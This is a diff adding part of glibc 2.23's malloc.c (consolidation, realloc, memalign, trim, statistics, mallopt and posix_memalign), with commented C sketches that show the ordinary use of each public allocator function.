+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, 0);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = p->prev_size;
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
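+
+/*
+   malloc_consolidate is not called on every free; a request outside
+   smallbin range reaches it from _int_malloc.  A sketch of a call pattern
+   that exercises it (glibc 2.23 assumed, sizes illustrative):
+
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *f[8];
+
+       for (int i = 0; i < 8; i++)
+         f[i] = malloc (0x20);   // fastbin-sized
+       for (int i = 0; i < 8; i++)
+         free (f[i]);            // parked in a fastbin, inuse bits still set
+
+       // A largebin-range request takes the !in_smallbin_range branch in
+       // _int_malloc, which consolidates the fastbins: adjacent freed fast
+       // chunks are merged and moved to the unsorted bin before the search.
+       void *big = malloc (0x500);
+       free (big);
+       return 0;
+     }
+*/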
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (oldp->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (next->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8-byte sizes).
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
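+
+/*
+   Whether _int_realloc extends in place (into top or a free next chunk) or
+   falls back to allocate/copy/free is visible to the caller only through
+   the returned pointer.  A sketch (sizes illustrative; comparing the old
+   pointer after a move is done here purely for demonstration):
+
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       char *p = malloc (0x100);
+       char *q = realloc (p, 0x800);
+
+       printf ("%s\n", p == q ? "grew in place"
+                              : "moved: allocate, copy, free");
+       free (q);
+       return 0;
+     }
+*/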
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    {
+      /*
+         Find an aligned spot inside chunk.  Since we need to give back
+         leading space in a chunk of at least MINSIZE, if the first
+         calculation places us at a spot with less than MINSIZE leader,
+         we can move to the next aligned spot -- we've allocated enough
+         total room so that this is always possible.
+       */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          newp->prev_size = p->prev_size + leadsize;
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
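+
+/*
+   A sketch of the over-allocate-then-trim strategy above as seen from the
+   public memalign interface (alignment and size are illustrative; anything
+   beyond malloc's default 2*SIZE_SZ alignment goes through this path):
+
+     #include <stdio.h>
+     #include <stdlib.h>
+     #include <malloc.h>
+
+     int main (void)
+     {
+       void *p = memalign (0x1000, 0x100);
+
+       printf ("p = %p, aligned = %d\n", p,
+               (int) (((unsigned long) p % 0x1000) == 0));
+       free (p);
+       return 0;
+     }
+*/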
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
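+
+/*
+   malloc_trim walks every arena with mtrim above: whole free pages inside
+   bins are madvised away and, for the main arena, systrim may shrink the
+   brk.  A sketch (allocation count and size are illustrative and kept
+   below the mmap threshold so the chunks come from the heap):
+
+     #include <stdio.h>
+     #include <stdlib.h>
+     #include <malloc.h>
+
+     int main (void)
+     {
+       void *p[64];
+
+       for (int i = 0; i < 64; i++)
+         p[i] = malloc (0x1000);
+       for (int i = 0; i < 64; i++)
+         free (p[i]);
+
+       printf ("released: %d\n", malloc_trim (0));   // often 1 here
+       return 0;
+     }
+*/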
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+        return chunksize (p) - 2 * SIZE_SZ;
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
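+
+/*
+   musable reports chunksize minus the inline overhead, so the usable size
+   is at least what was requested and usually a little more because of
+   rounding.  A sketch (the 104 in the comment assumes a 64-bit build):
+
+     #include <stdio.h>
+     #include <stdlib.h>
+     #include <malloc.h>
+
+     int main (void)
+     {
+       void *p = malloc (100);
+
+       printf ("requested 100, usable %zu\n",
+               malloc_usable_size (p));   // 104 on x86-64 glibc 2.23
+       free (p);
+       return 0;
+     }
+*/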
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = mp_.max_total_mem;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
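+
+/*
+   A sketch of reading the accumulated statistics through the public
+   mallinfo wrapper (field meanings follow int_mallinfo above; the struct
+   uses plain int fields, so very large heaps can overflow them):
+
+     #include <stdio.h>
+     #include <stdlib.h>
+     #include <malloc.h>
+
+     int main (void)
+     {
+       void *p = malloc (0x500);
+       struct mallinfo mi = mallinfo ();
+
+       printf ("arena    (system bytes) = %d\n", mi.arena);
+       printf ("uordblks (in use)       = %d\n", mi.uordblks);
+       printf ("fordblks (free)         = %d\n", mi.fordblks);
+       free (p);
+       return 0;
+     }
+*/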
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      (void) mutex_unlock (&ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
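+
+/*
+   malloc_stats prints the per-arena summary above directly to stderr, so
+   it needs no setup -- a quick sketch:
+
+     #include <stdlib.h>
+     #include <malloc.h>
+
+     int main (void)
+     {
+       void *p = malloc (0x500);
+       free (p);
+       malloc_stats ();   // "Arena 0: system bytes ... in use bytes ..."
+       return 0;
+     }
+*/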
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  (void) mutex_lock (&av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      LIBC_PROBE (memory_mallopt_trim_threshold, 3, value,
+                  mp_.trim_threshold, mp_.no_dyn_threshold);
+      mp_.trim_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_TOP_PAD:
+      LIBC_PROBE (memory_mallopt_top_pad, 3, value,
+                  mp_.top_pad, mp_.no_dyn_threshold);
+      mp_.top_pad = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_MMAP_THRESHOLD:
+      /* Forbid setting the threshold too high. */
+      if ((unsigned long) value > HEAP_MAX_SIZE / 2)
+        res = 0;
+      else
+        {
+          LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value,
+                      mp_.mmap_threshold, mp_.no_dyn_threshold);
+          mp_.mmap_threshold = value;
+          mp_.no_dyn_threshold = 1;
+        }
+      break;
+
+    case M_MMAP_MAX:
+      LIBC_PROBE (memory_mallopt_mmap_max, 3, value,
+                  mp_.n_mmaps_max, mp_.no_dyn_threshold);
+      mp_.n_mmaps_max = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_CHECK_ACTION:
+      LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+      check_action = value;
+      break;
+
+    case M_PERTURB:
+      LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+      perturb_byte = value;
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+          mp_.arena_test = value;
+        }
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+          mp_.arena_max = value;
+        }
+      break;
+    }
+  (void) mutex_unlock (&av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
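+
+/*
+   A sketch of two commonly tuned knobs (values are illustrative, not
+   recommendations): M_MXFAST = 0 effectively disables fastbins
+   (set_max_fast above), and a low M_MMAP_THRESHOLD routes larger requests
+   through mmap instead of the heap:
+
+     #include <stdlib.h>
+     #include <malloc.h>
+
+     int main (void)
+     {
+       mallopt (M_MXFAST, 0);              // no fastbin caching at all
+       mallopt (M_MMAP_THRESHOLD, 0x1000); // >= 4 KiB requests use mmap
+
+       void *p = malloc (0x2000);          // now served by mmap
+       free (p);                           // and released with munmap
+       return 0;
+     }
+*/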
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
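+
+/*
+   For instance, forcing every request through mmap (as mentioned above)
+   only needs a MORECORE that always fails -- a sketch of such a
+   build-time configuration, not part of this tree:
+
+     static void *
+     fail_morecore (ptrdiff_t increment)
+     {
+       return (void *) MORECORE_FAILURE;
+     }
+
+     #define MORECORE            fail_morecore
+     #define MORECORE_CONTIGUOUS 0
+ */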
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message (action & 2, "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
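+
+/*
+   A sketch of the POSIX-mandated argument check performed above: the
+   alignment must be a power-of-two multiple of sizeof (void *), otherwise
+   EINVAL is returned without allocating (values illustrative):
+
+     #include <stdio.h>
+     #include <stdlib.h>
+     #include <errno.h>
+
+     int main (void)
+     {
+       void *p = NULL;
+
+       int r = posix_memalign (&p, 24, 0x100);   // 24: not a power of two
+       printf ("bad alignment -> %d (EINVAL = %d)\n", r, EINVAL);
+
+       r = posix_memalign (&p, 64, 0x100);       // ok: p is 64-byte aligned
+       printf ("ok -> %d, p = %p\n", r, p);
+       free (p);
+       return 0;
+     }
+*/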
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
